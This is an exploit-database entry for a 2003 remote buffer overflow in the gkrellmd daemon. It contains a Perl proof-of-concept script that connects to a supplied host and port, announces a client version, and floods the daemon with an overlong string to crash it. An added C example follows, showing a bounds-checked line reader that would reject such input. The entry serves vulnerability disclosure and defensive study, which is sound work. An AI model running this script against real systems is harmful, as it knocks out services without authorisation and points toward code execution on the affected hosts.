Gkrellmd 2.1 - Remote Buffer Overflow (1)

EDB-ID: 22831
Author: dodo
Type: dos
Platform: FreeBSD
Date: 2003-06-24

source: https://www.securityfocus.com/bid/8022/info

GKrellMd has been reported prone to a remote buffer overflow vulnerability; arbitrary code execution is possible.

The issue is caused by insufficient bounds checking on network-based data. If data exceeding the maximum reserved memory buffer size is received, arbitrary memory may be corrupted.

A remote attacker may ultimately exploit this issue to seize control of the affected daemon and execute arbitrary code.

This vulnerability has been reported to affect Gkrellm 2.1.13.

	#!/usr/bin/perl -s
	use IO::Socket;
	#
	# proof of concept code
	# tested: gkrellmd 2.1.10
	#

	if(!$ARGV[0] || !$ARGV[1])
	{ print "usage: ./gkrellmcrash.pl <host> <port>\n"; exit(-1); }

	$host = $ARGV[0];
	$port = $ARGV[1];
	$exploitstring = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";

	$socket = new IO::Socket::INET
	(
	Proto    => "tcp",
	PeerAddr => $host,
	PeerPort => $port,
	);

	die "unable to connect to $host:$port ($!)\n" unless $socket;

	print $socket "gkrellm 2.1.10\n"; # tell the daemon which client we have
	sleep(1);
	print $socket $exploitstring;

	close($socket);
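
The bounds check whose absence the description above reports, shown as an added defensive example; it is not GKrellMd's code and not part of the original entry. `LINE_CAP`, the function names and the 200-byte filler are assumptions, and the input is constructed to mirror the shape of the traffic above (a version line followed by an unterminated run of bytes).

```c
#include <stdio.h>
#include <string.h>

#define LINE_CAP 64   /* assumed size of the daemon's fixed line buffer */
enum line_status { LINE_OK, LINE_INCOMPLETE, LINE_TOO_LONG };

/* Copy one '\n'-terminated line from in[0..in_len) into out[out_cap].
 * An unterminated run that already fills the buffer is rejected at once. */
enum line_status read_line_bounded(const char *in, size_t in_len,
                                   char *out, size_t out_cap, size_t *used)
{
    const char *nl = memchr(in, '\n', in_len);
    size_t len = nl ? (size_t)(nl - in) : in_len;
    *used = 0;
    if (len >= out_cap)
        return LINE_TOO_LONG;      /* no room for data plus terminator */
    if (nl == NULL)
        return LINE_INCOMPLETE;    /* wait for more bytes, copy nothing */
    memcpy(out, in, len);
    out[len] = '\0';
    *used = len + 1;               /* the line plus its newline */
    return LINE_OK;
}

/* Returns the number of lines accepted, or -1 when the peer must be dropped. */
int process_stream(const char *stream, size_t n)
{
    char line[LINE_CAP];
    size_t off = 0, used;
    int lines = 0;
    while (off < n) {
        enum line_status st =
            read_line_bounded(stream + off, n - off, line, sizeof line, &used);
        if (st == LINE_TOO_LONG) return -1;
        if (st == LINE_INCOMPLETE) break;
        off += used; lines++;
    }
    return lines;
}

/* Constructed input: a version line, then 200 filler bytes with no newline. */
int demo_oversized_peer(void)
{
    char stream[15 + 200] = "gkrellm 2.1.10\n";
    memset(stream + 15, 'A', 200);
    return process_stream(stream, sizeof stream);
}

int main(void) { printf("oversized peer -> %d\n", demo_oversized_peer()); return 0; }
```

Rejecting on length before a newline arrives matters here: a reader that waits for the terminator before checking size never reaches the check when the peer omits it.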